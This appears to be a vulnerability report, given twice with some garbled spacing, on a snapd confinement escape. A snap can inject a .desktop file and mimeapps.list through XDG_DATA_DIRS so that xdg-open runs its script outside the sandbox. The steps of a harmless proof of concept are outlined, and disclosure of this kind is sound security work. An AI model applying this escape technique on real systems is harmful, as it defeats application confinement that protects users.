snap userd's OpenURL implementation alters the value of $XDG_DATA_DIRS to include a directory controlled by the calling snap before calling /usr/bin/xdg-open:
This allows the snap to control how the URL will be opened, including having executables provided by the snap run outside of confinement.
Attached is an example snap demonstrating the exploit. It works as follows:
1. the snap provides a single command plugging the desktop interface that calls "xdg-open help://whatever"
2. userd invokes the host system /usr/bin/xdg-open with $SNAP/usr/share/applications at the start of $XDG_DATA_DIRS.
3. under $SNAP/usr/share/applications, we have a yelp.desktop file whose Exec line points to an "outside-sandbox.sh" script shipped with the snap, and a mimeapps.list file to set it as the default handler for the "help:" scheme.
4. the "outside-sandbox.sh" script is executed without confinement and writes a file /tmp/foo.txt
This file can be seen in the host system /tmp rather than the snap's private /tmp, demonstrating that it was run outside the sandbox.
snap userd's OpenURL implementation alters the value of $XDG_DATA_DIRS to include a directory controlled by the calling snap before calling /usr/bin/xdg-open:
https:/ /github. com/snapcore/ snapd/blob/ 7f678b92/ usersession/ userd/launcher. go#L109- L113
This allows the snap to control how the URL will be opened, including having executables provided by the snap run outside of confinement.
Attached is an example snap demonstrating the exploit. It works as follows:
1. the snap provides a single command plugging the desktop interface that calls "xdg-open help://whatever"
2. userd invokes the host system /usr/bin/xdg-open with $SNAP/usr/ share/applicati ons at the start of $XDG_DATA_DIRS.
3. under $SNAP/usr/ share/applicati ons, we have a yelp.desktop file whose Exec line points to an "outside- sandbox. sh" script shipped with the snap, and a mimeapps.list file to set it as the default handler for the "help:" scheme.
4. the "outside- sandbox. sh" script is executed without confinement and writes a file /tmp/foo.txt
This file can be seen in the host system /tmp rather than the snap's private /tmp, demonstrating that it was run outside the sandbox.